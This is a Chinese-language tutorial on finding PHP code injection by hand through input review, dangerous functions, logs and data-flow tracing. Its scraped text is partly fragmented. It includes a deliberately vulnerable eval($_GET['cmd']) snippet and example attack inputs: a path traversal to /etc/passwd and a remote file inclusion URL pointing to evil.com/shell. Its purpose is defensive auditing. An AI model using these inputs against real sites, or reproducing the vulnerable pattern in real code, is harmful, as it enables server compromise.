PHP代码注入检测手动方法_PHP代码注入手动检测步骤详解

手动检测PHP代码注入需从输入源、危险函数、数据流和日志入手，通过审查用户输入是否被未经净化地传递给eval()、system()、include()等高风险函数，追踪数据流向，分析日志异常，并结合业务逻辑判断漏洞存在。

手动检测PHP代码注入，本质上就是扮演一个“侦探”的角色，通过细致入微的观察和逻辑推理，从代码、系统行为和日志中找出那些不该出现的、由外部输入控制的执行路径或数据。它不像自动化工具那样依赖预设规则，更多的是依赖经验、直觉以及对系统运作机制的深刻理解，去捕捉那些“不对劲”的蛛丝马迹。

解决方案

要手动检测PHP代码注入，我们需要从几个关键维度入手，这通常是一个迭代且需要耐心的过程：

1. 审查输入源：

   • 全局变量检查：

     $ _GET

     、

     $ _POST

     、

     $ _REQUEST

     、

     $ _COOKIE

     、

     $ _SERVER

     甚至

     $ _FILES

     ，任何来自用户或外部环境的数据都可能是潜在的攻击入口。我们需要追踪这些数据在代码中的流向。
   • 数据净化与验证： 检查代码中是否有对这些输入的严格过滤、转义或类型转换。例如，如果一个参数预期是整数，但代码没有强制转换，那么字符串形式的恶意输入就可能被执行。
   • 白名单机制： 理想情况下，应该使用白名单来限制允许的输入值或格式，而不是黑名单。

2. 定位危险函数的使用：

   立即学习“PHP免费学习笔记（深入）”；

   • 代码执行函数：

     eval()

     、

     system()

     、

     exec()

     、

     passthru()

     、

     shell_exec()

     、`` (反引号操作符) 等。这些函数直接执行字符串作为代码或系统命令，是代码注入和命令注入的重灾区。
   • 文件操作函数：

     include()

     、

     require()

     、

     include_once()

     、

     require_once()

     。当这些函数的参数可控时，可能导致本地文件包含（LFI）或远程文件包含（RFI），进而执行任意代码。

     file_get_contents()

     、

     file_put_contents()

     等也需警惕，它们可能被用于读取敏感文件或写入webshell。
   • 变量函数与回调函数： PHP允许使用变量作为函数名调用，如

     $func_name($arg)

     ，或者在

     call_user_func()

     、

     array_map()

     等函数中使用用户可控的回调函数。
   • 反序列化：

     unserialize()

     函数在处理不可信的用户输入时，可能导致PHP对象注入，进而触发魔术方法（如

     __destruct()

     ）中的危险操作。

3. 检查文件系统异常：

   • 未知文件： 留意Web服务器目录下是否存在不属于项目、创建时间异常、内容可疑的PHP文件（如

     shell.php

     、

     cmd.php

     或一些乱码文件名）。这些往往是攻击者成功注入后上传的webshell。
   • 文件权限： 检查关键文件和目录的权限设置，看是否有不恰当的可写权限，这可能被攻击者利用来上传或修改文件。

4. 分析错误日志和访问日志：

   • PHP错误日志： 仔细查看PHP的错误日志，寻找

     eval()

     、

     include()

     等函数在非预期参数下产生的警告或错误，这可能是攻击尝试的痕迹。
   • Web服务器访问日志： 检查HTTP请求中是否存在异常参数、编码、请求路径或请求方法，特别是那些包含特殊字符（如

     ../

     、

     ;

     、

     |

     、

     &

     ）或看起来像命令的字符串。

5. 追踪数据流：

   • 从输入点（

     $_GET

     、

     $_POST

     等）开始，一步步追踪数据在代码中的传递，看它是否在某个环节被拼接成代码、命令或文件路径，并最终被危险函数执行。这需要对代码结构有较好的理解。

为什么手动检测仍然有其不可替代的价值？

说实话，我个人觉得，尽管现在自动化工具五花八门，但手动检测PHP代码注入的价值，就好比老中医看病，它有那种自动化工具难以企及的“望闻问切”的灵活性和深度。自动化工具再智能，也只是基于既定规则和模式去扫描。它可能会发现那些“教科书式”的漏洞，但对于一些业务逻辑层面的、或者需要结合上下文才能判断的“零日”或“半零日”漏洞，自动化工具往往束手无策。

举个例子，一个业务流程中，某个参数在A函数里经过了严格过滤，但在B函数里，这个参数又被重新组合，并且在没有再次过滤的情况下被传递给一个危险函数。自动化工具可能只看到A函数的过滤，就觉得“安全”了。但人就不一样，我们能理解整个业务流，能跳出局部，从全局去思考数据是如何从不可信的源头流向危险的“水槽”的。这种对业务逻辑的理解、对代码意图的洞察，是目前任何AI或扫描器都无法完全取代的。再者，很多时候，一些巧妙的混淆和编码也能轻松绕过自动化工具的检测，这时候，只有人才能通过逆向思维和经验去揭示其真面目。

哪些PHP函数是代码注入的“重灾区”？

在PHP的世界里，有些函数就像是双刃剑，强大但极易被滥用，从而成为代码注入的“重灾区”。我个人在代码审计时，看到这些函数，总会条件反射地多看几眼。

首当其冲的当然是

eval()

eval()

Bika.ai

打造您的AI智能体员工团队

下载

// 这是一个非常危险的例子，切勿在生产环境使用！
$code = $_GET['cmd']; // 假设用户输入：phpinfo();
eval($code); // 攻击者可以直接执行任意PHP代码

紧随其后的是一系列系统命令执行函数：

system()

exec()

passthru()

shell_exec()

`

include()

require()

include($_GET['page'] . '.php');

?page=../../../../etc/passwd

?page=http://evil.com/shell

unserialize()

__destruct()

__wakeup()

还有一些不那么显眼但同样危险的：

• create_function()

  ：虽然在PHP 7.2中已被弃用，但在老代码中依然存在，它允许动态创建匿名函数，其内部代码同样可能被注入。

• preg_replace()

  配合

  /e

  修饰符：在旧版PHP中，

  /e

  修饰符会将替换字符串当作PHP代码执行，这也是一个经典的注入点。
• 变量函数：

  $func_name($arg)

  这种形式，如果

  $func_name

  变量被用户控制，攻击者就可以调用任意PHP函数。

理解这些函数的危险性，并在代码审计时特别关注它们，是手动检测代码注入的关键一步。

如何在代码库中快速定位潜在的注入点？

在庞大的代码库里找注入点，就像大海捞针，但我们不是盲目地捞。我通常会采用几种策略来缩小范围，让这个过程更有效率。

一个直接的方法是全局搜索关键词。我会用

grep

eval(

system(

include(

require(

unserialize(

preg_replace(

/e

$_GET

$_POST

$_COOKIE

$_REQUEST

另一个重要的思路是反向追踪数据流。我喜欢从所有的外部输入点开始。想象一下，所有

$_GET

$_POST

$_COOKIE

$_FILES

$_SERVER

htmlspecialchars

mysqli_real_escape_string

intval

此外，关注业务逻辑中需要动态执行或加载的模块。比如，一些CMS系统为了扩展性，会允许用户在后台配置自定义的模板路径、插件路径，或者执行一些自定义代码片段。这些地方往往是攻击者最喜欢利用的，因为它们天生就设计成可以处理“不那么固定”的内容。

最后，利用版本控制系统（如Git）的历史记录也是一个不错的辅助手段。审查最近修改过的代码，特别是那些涉及用户输入处理、文件操作或核心业务逻辑的部分。新引入的代码往往更容易出现漏洞，因为它们还没有经过充分的测试和审计。通过

git diff

git blame

这些方法结合起来，能大大提高在复杂代码库中定位潜在注入点的效率和准确性。毕竟，手动检测的核心在于理解代码的意图和数据流，而这些方法正是为了帮助我们构建这种理解。